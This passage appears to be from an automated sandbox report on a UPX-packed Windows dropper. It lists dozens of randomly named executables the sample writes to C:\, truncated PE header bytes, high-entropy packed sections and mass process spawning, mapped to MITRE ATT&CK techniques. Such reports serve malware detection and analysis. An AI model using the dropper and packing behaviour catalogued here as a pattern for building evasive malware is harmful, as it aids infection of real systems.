4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"8486482.exe\" wrote 16814 bytes starting with PE header signature to file \"C:\\202808.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"202808.exe\" wrote 16834 bytes starting with PE header signature to file \"C:\\fjhdxhf.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"fjhdxhf.exe\" wrote 16846 bytes starting with PE header signature to file \"C:\\vnhnhxx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"vnhnhxx.exe\" wrote 16862 bytes starting with PE header signature to file \"C:\\dfllnjr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"dfllnjr.exe\" wrote 16877 bytes starting with PE header signature to file \"C:\\hlrtth.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"hlrtth.exe\" wrote 16887 bytes starting with PE header signature to file \"C:\\fhjttl.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"fhjttl.exe\" wrote 16901 bytes starting with PE header signature to file \"C:\\22624.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"22624.exe\" wrote 16921 bytes starting with PE header signature to file \"C:\\06668.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"06668.exe\" wrote 16937 bytes starting with PE header signature to file \"C:\\482820.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"482820.exe\" wrote 16955 bytes starting with PE header signature to file \"C:\\840062.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"840062.exe\" wrote 16972 bytes starting with PE header signature to file \"C:\\btvjnxf.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"btvjnxf.exe\" wrote 16984 bytes starting with PE header signature to file \"C:\\vbtfdd.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"vbtfdd.exe\" wrote 17003 bytes starting with PE header signature to file \"C:\\nlrvnpx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"nlrvnpx.exe\" wrote 17016 bytes starting with PE header signature to file \"C:\\xvprxbd.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"xvprxbd.exe\" wrote 17029 bytes starting with PE header signature to file \"C:\\vdphh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"vdphh.exe\" wrote 17043 bytes starting with PE header signature to file \"C:\\0484008.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"0484008.exe\" wrote 17056 bytes starting with PE header signature to file \"C:\\88060.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"88060.exe\" wrote 17067 bytes starting with PE header signature to file \"C:\\8084222.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"8084222.exe\" wrote 17077 bytes starting with PE header signature to file \"C:\\4220002.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"4220002.exe\" wrote 17088 bytes starting with PE header signature to file \"C:\\44206.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"44206.exe\" wrote 17107 bytes starting with PE header signature to file \"C:\\220404.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"220404.exe\" wrote 17127 bytes starting with PE header signature to file \"C:\\npjbvrb.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"npjbvrb.exe\" wrote 17147 bytes starting with PE header signature to file \"C:\\xprhl.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"xprhl.exe\" wrote 17159 bytes starting with PE header signature to file \"C:\\rxfxxnn.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rxfxxnn.exe\" wrote 17176 bytes starting with PE header signature to file \"C:\\dpndv.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"dpndv.exe\" wrote 17189 bytes starting with PE header signature to file \"C:\\fnrxft.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"fnrxft.exe\" wrote 17199 bytes starting with PE header signature to file \"C:\\lxhhl.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"lxhhl.exe\" wrote 17214 bytes starting with PE header signature to file \"C:\\vhftp.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"vhftp.exe\" wrote 17225 bytes starting with PE header signature to file \"C:\\rtrnhfh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rtrnhfh.exe\" wrote 17236 bytes starting with PE header signature to file \"C:\\lhrhrpt.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"lhrhrpt.exe\" wrote 17255 bytes starting with PE header signature to file \"C:\\drbdjh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"tfpfbjl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"rjvxrf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"pttxvt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"lnnjjb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"jfrfbtr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"bpbtb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"pjbbvdd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"pdnrb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"hpdnldp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"xlrxxtf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"rvhlvt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"vxxfjr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"dnxpf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"drbdjh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\drbdjh.exe]- [targetUID: 00000000-00003252]\n \"lhrhrpt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lhrhrpt.exe]- [targetUID: 00000000-00003748]\n \"rtrnhfh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rtrnhfh.exe]- [targetUID: 00000000-00003748]\n \"vhftp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vhftp.exe]- [targetUID: 00000000-00004488]\n \"lxhhl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lxhhl.exe]- [targetUID: 00000000-00004488]\n \"fnrxft.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fnrxft.exe]- [targetUID: 00000000-00002576]\n \"dpndv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dpndv.exe]- [targetUID: 00000000-00001884]\n \"rxfxxnn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rxfxxnn.exe]- [targetUID: 00000000-00001884]\n \"xprhl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xprhl.exe]- [targetUID: 00000000-00001620]\n \"npjbvrb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\npjbvrb.exe]- [targetUID: 00000000-00001620]\n \"220404.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\220404.exe]- [targetUID: 00000000-00000864]\n \"44206.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\44206.exe]- [targetUID: 00000000-00000864]\n \"4220002.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4220002.exe]- [targetUID: 00000000-00003876]\n \"8084222.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8084222.exe]- [targetUID: 00000000-00000416]\n \"88060.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\88060.exe]- [targetUID: 00000000-00002836]\n \"0484008.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0484008.exe]- [targetUID: 00000000-00002832]\n \"vdphh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vdphh.exe]- [targetUID: 00000000-00002832]\n \"xvprxbd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xvprxbd.exe]- [targetUID: 00000000-00000328]\n \"nlrvnpx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nlrvnpx.exe]- [targetUID: 00000000-00000328]\n \"vbtfdd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vbtfdd.exe]- [targetUID: 00000000-00000272]\n \"btvjnxf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\btvjnxf.exe]- [targetUID: 00000000-00000272]\n \"840062.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\840062.exe]- [targetUID: 00000000-00003804]\n \"482820.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\482820.exe]- [targetUID: 00000000-00002756]\n \"06668.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\06668.exe]- [targetUID: 00000000-00002756]\n \"22624.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\22624.exe]- [targetUID: 00000000-00004172]\n \"fhjttl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fhjttl.exe]- [targetUID: 00000000-00004172]\n \"hlrtth.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hlrtth.exe]- [targetUID: 00000000-00002784]\n \"dfllnjr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dfllnjr.exe]- [targetUID: 00000000-00003680]\n \"vnhnhxx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vnhnhxx.exe]- [targetUID: 00000000-00003556]\n \"fjhdxhf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fjhdxhf.exe]- [targetUID: 00000000-00003556]\n \"202808.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\202808.exe]- [targetUID: 00000000-00003204]\n \"8486482.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8486482.exe]- [targetUID: 00000000-00002976]\n \"02848.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\02848.exe]- [targetUID: 00000000-00002976]\n \"82080.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\82080.exe]- [targetUID: 00000000-00003700]\n \"6466842.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6466842.exe]- [targetUID: 00000000-00003700]\n \"0660220.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0660220.exe]- [targetUID: 00000000-00002776]\n \"482028.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\482028.exe]- [targetUID: 00000000-00002776]\n \"664004.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\664004.exe]- [targetUID: 00000000-00001380]\n \"vdxvjb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vdxvjb.exe]- [targetUID: 00000000-00001380]\n \"hntdntx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hntdntx.exe]- [targetUID: 00000000-00003292]\n \"2848464.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2848464.exe]- [targetUID: 00000000-00003484]\n \"26064.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\26064.exe]- [targetUID: 00000000-00004160]\n \"408224.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\408224.exe]- [targetUID: 00000000-00001920]\n \"22260.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\22260.exe]- [targetUID: 00000000-00001920]\n \"20640.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\20640.exe]- [targetUID: 00000000-00003764]\n \"brrppv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\brrppv.exe]- [targetUID: 00000000-00003540]\n \"njdbdxd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\njdbdxd.exe]- [targetUID: 00000000-00003540]\n \"fnvpbxr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fnvpbxr.exe]- [targetUID: 00000000-00003560]\n \"4862082.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4862082.exe]- [targetUID: 00000000-00003560]\n \"22404.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\22404.exe]- [targetUID: 00000000-00004336]\n \"640660.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\640660.exe]- [targetUID: 00000000-00002764]\n \"024648.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\024648.exe]- [targetUID: 00000000-00002764]\n \"xnpjdph.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xnpjdph.exe]- [targetUID: 00000000-00004280]\n \"hvjhb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hvjhb.exe]- [targetUID: 00000000-00006016]\n \"pnrdltb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pnrdltb.exe]- [targetUID: 00000000-00006016]\n \"rlrbxrl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rlrbxrl.exe]- [targetUID: 00000000-00006136]\n \"004422.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\004422.exe]- [targetUID: 00000000-00005464]\n \"rrjxnjh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rrjxnjh.exe]- [targetUID: 00000000-00005756]\n \"ntpbdh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ntpbdh.exe]- [targetUID: 00000000-00005756]\n \"bbpbfhd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bbpbfhd.exe]- [targetUID: 00000000-00005940]\n \"lthxxd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lthxxd.exe]- [targetUID: 00000000-00005940]\n \"482642.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\482642.exe]- [targetUID: 00000000-00006068]\n \"4060800.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4060800.exe]- [targetUID: 00000000-00005812]\n \"0004664.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0004664.exe]- [targetUID: 00000000-00005812]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6\" has section name UPX1 with entropy \"7.97244478673\"\n \"tfpfbjl.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"rjvxrf.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"pttxvt.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"lnnjjb.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"jfrfbtr.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"bpbtb.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"pjbbvdd.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"pdnrb.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"hpdnldp.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"xlrxxtf.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"rvhlvt.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"vxxfjr.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"dnxpf.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"drbdjh.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"lhrhrpt.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"rtrnhfh.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"vhftp.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"lxhhl.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"fnrxft.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"dpndv.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"rxfxxnn.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"xprhl.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"npjbvrb.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"220404.exe\" has section name UPX1 with entropy \"7.97244478673\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-7", "relevance": 10, "name": "PE file is packed with UPX", "description": "\"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6\" has a section named \"UPX0\"\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6\" has a section named \"UPX1\"\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6\" has a section named \"UPX2\"\n \"tfpfbjl.exe\" has a section named \"UPX0\"\n \"tfpfbjl.exe\" has a section named \"UPX1\"\n \"tfpfbjl.exe\" has a section named \"UPX2\"\n \"rjvxrf.exe\" has a section named \"UPX0\"\n \"rjvxrf.exe\" has a section named \"UPX1\"\n \"rjvxrf.exe\" has a section named \"UPX2\"\n \"pttxvt.exe\" has a section named \"UPX0\"\n \"pttxvt.exe\" has a section named \"UPX1\"\n \"pttxvt.exe\" has a section named \"UPX2\"\n \"lnnjjb.exe\" has a section named \"UPX0\"\n \"lnnjjb.exe\" has a section named \"UPX1\"\n \"lnnjjb.exe\" has a section named \"UPX2\"\n \"jfrfbtr.exe\" has a section named \"UPX0\"\n \"jfrfbtr.exe\" has a section named \"UPX1\"\n \"jfrfbtr.exe\" has a section named \"UPX2\"\n \"bpbtb.exe\" has a section named \"UPX0\"\n \"bpbtb.exe\" has a section named \"UPX1\"\n \"bpbtb.exe\" has a section named \"UPX2\"\n \"pjbbvdd.exe\" has a section named \"UPX0\"\n \"pjbbvdd.exe\" has a section named \"UPX1\"\n \"pjbbvdd.exe\" has a section named \"UPX2\"\n \"pdnrb.exe\" has a section named \"UPX0\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" (UID: 00000000-00005860)\n Spawned process \"0004664.exe\" (UID: 00000000-00005812)\n Spawned process \"4060800.exe\" (UID: 00000000-00006068)\n Spawned process \"482642.exe\" (UID: 00000000-00006112)\n Spawned process \"lthxxd.exe\" (UID: 00000000-00005940)\n Spawned process \"bbpbfhd.exe\" (UID: 00000000-00005952)\n Spawned process \"ntpbdh.exe\" (UID: 00000000-00005756)\n Spawned process \"rrjxnjh.exe\" (UID: 00000000-00005464)\n Spawned process \"004422.exe\" (UID: 00000000-00006136)\n Spawned process \"rlrbxrl.exe\" (UID: 00000000-00005992)\n Spawned process \"pnrdltb.exe\" (UID: 00000000-00006016)\n Spawned process \"hvjhb.exe\" (UID: 00000000-00004016)\n Spawned process \"xnpjdph.exe\" (UID: 00000000-00004280)\n Spawned process \"024648.exe\" (UID: 00000000-00002764)\n Spawned process \"640660.exe\" (UID: 00000000-00005892)\n Spawned process \"22404.exe\" (UID: 00000000-00004336)\n Spawned process \"4862082.exe\" (UID: 00000000-00003560)\n Spawned process \"fnvpbxr.exe\" (UID: 00000000-00003432)\n Spawned process \"njdbdxd.exe\" (UID: 00000000-00003540)\n Spawned process \"brrppv.exe\" (UID: 00000000-00003764)\n Spawned process \"20640.exe\" (UID: 00000000-00003840)\n Spawned process \"22260.exe\" (UID: 00000000-00001920)\n Spawned process \"408224.exe\" (UID: 00000000-00004160)\n Spawned process \"26064.exe\" (UID: 00000000-00003484)\n Spawned process \"2848464.exe\" (UID: 00000000-00004200)\n Spawned process \"hntdntx.exe\" (UID: 00000000-00003292)\n Spawned process \"vdxvjb.exe\" (UID: 00000000-00001380)\n Spawned process \"664004.exe\" (UID: 00000000-00004244)\n Spawned process \"482028.exe\" (UID: 00000000-00002776)\n Spawned process \"0660220.exe\" (UID: 00000000-00001564)\n Spawned process \"6466842.exe\" (UID: 00000000-00003700)\n Spawned process \"82080.exe\" (UID: 00000000-00003272)\n Spawned process \"02848.exe\" (UID: 